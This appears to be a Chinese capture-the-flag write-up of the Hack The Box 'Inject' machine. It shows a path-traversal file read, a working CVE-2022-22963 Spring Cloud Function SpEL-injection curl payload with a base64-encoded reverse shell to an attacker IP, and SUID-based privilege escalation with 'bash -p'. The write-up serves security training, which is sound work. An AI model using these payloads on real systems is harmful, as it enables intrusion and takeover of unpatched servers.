HTB靶场:简单inject

这篇具有很好参考价值的文章主要介绍了HTB靶场:简单inject。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

HTB靶场:简单inject

1、进入靶场,连接vpn后开启靶机 inject

HTB靶场:简单inject

2、nmap扫描一下靶机

nmap -v -A 10.10.11.*

HTB靶场:简单inject

扫描后显示服务和端口信息8080和22

3、打开web服务

HTB靶场:简单inject

1)有上传文件功能 简单上传了几个文件(txt,img等 上传过程根据参数简单测试了rce和注入发现无回显并且不对猜测可能不是此考点、转换思路上传的图片)
2)上传图片会显示路径。
HTB靶场:简单inject3)看到有路径猜测是否可跨目录文件包含,试后发现有并且有回显

/show_image?img=../../../../../../../etc/passwd

4)包含可直接显示目录 最终找到web目录pom.xml看看有什么依赖

HTB靶场:简单injectHTB靶场:简单inject5)知识点 Spel表达式注入(3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2)CVE-2022-22963、直接打的反弹shell的payload

curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMTEvNjY4OCAwPiYx}|{base64,-d}|{bash,-i} ")' --data-raw 'data' -v

6)以上base64换成自己地址、监听端口6688

HTB靶场:简单inject

7)发现无权限查看目录
HTB靶场:简单inject
8)提权(推荐一个linux提权 https://pentestlab.blog/2017/09/25/suid-executables/)

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
bash -p

发现有bash可用
HTB靶场:简单inject

直接 bash -p 提权成功
9)寻找flag root目录下/

cat /home/phil/user.txt
cat /root/root.txt

HTB靶场:简单inject文章来源地址https://www.toymoban.com/news/detail-488809.html

到了这里,关于HTB靶场:简单inject的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 一次简单的SQL注入靶场练习

    为了巩固SQL注入以及实战演练的需要,我们来做一次简单的关于SQL注入的实战靶场练习 靶场下载地址: https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso 因为是linux系统,大家要注意安装的是linux的Debian系统,系统才能正常的运行,然后在设置里放置iso光盘就可以了。 安

    2023年04月10日
    浏览(37)
  • 使用Vscode连接进入docker容器

    使用Vscode连接进入docker容器 在使用Vscode连接远程服务器进行操作时,使用Vscode丰富的插件进行,使用Remote-SSH连接服务器,但是该插件进行连接是不能进入到docker容器内部进行操作。想要直接进入到容器内部进行工作需要另外的方法。 方法一:使用ssh工具进行连接,容器在运

    2024年02月16日
    浏览(42)
  • Kali安装Docker并简单搭建漏洞靶场vulhub

    Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器或Windows 机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。还可以帮助安全人员进行靶场的搭建。 在kali上,先确定

    2024年02月15日
    浏览(44)
  • 华为手机如何进入开发者模式?连接studio真机调试

    对于安卓开发者来说, 真机调试 是非常好的选择,对电脑配置也没有过分的要求。如果采用A ndroid Studio自带安卓虚拟机调试 ,真的很慢,一点都不友好。 真机调试的步骤:打开设置-关于手机-版本号,然后 连续点击版本号 ,会提示 已经处于开发者选项 。退回到上级目录,

    2024年02月13日
    浏览(57)
  • homeassistant配置MQTT集成以及传感器实体(STM32连接进入homeassistant)

    大家可以看作者的小破站教学视频(如果喜欢的话可以点个关注,给个三联!啊哈哈哈哈哈哈): 【homeassistant配置MQTT集成以及传感器实体(STM32连接进入homeassistant)】 最近homeassistan更新之后,传统的MQTT服务器配置是完全不适用的 目前(2023.4.16)的教程都没有找到特别适用

    2024年02月10日
    浏览(41)
  • 小米手机解BL锁时 进入fastboot之后 PC端手机解锁工具一直显示未连接手机

    1. 首先想到换数据线 在自己换了几根数据线后未解决问题 2.重启电脑 常见毛病重启解决,但是尝试后依旧没有反应 3.驱动问题,尝试更换驱动 来自知乎的分享方法 如果解锁软件没有显示连接手机,是驱动问题,可以如下操作 数据线电脑USB口没有问题的情况下就是驱动的问

    2024年02月09日
    浏览(65)
  • HTB-Nineveh

    目录扫描 /info.php目录 目录扫描 这完全没头绪,估计是信息收集漏了东西,重新来一遍。 哈,我就知道。 当我输入admin会发现抱错变成了密码不可用,说明admin用户存在。 没有任何提示,尝试一下hydra的暴力破解。 多了张图片 secure_notes 。 对443登录进行hydra暴力破解, hydra

    2024年02月01日
    浏览(38)
  • HTB-DevOops

    根据文字所述,下面的图片是feed.py。 目录扫描 /upload如下: 上传测试xml文件。 得到反馈 怀疑是标签不匹配,尝试寻找匹配的标签。前面首页有提示: XML elements: Author, Subject, Content 。 构造XML如下: XEE利用,外部实体访问/etc/passwd。 找找看feed.py在哪里,就在当前目录下。 有

    2023年04月26日
    浏览(35)
  • HTB Monitored

    2024年01月20日
    浏览(31)
  • HTB Mailroom WriteUp

    2024年02月05日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包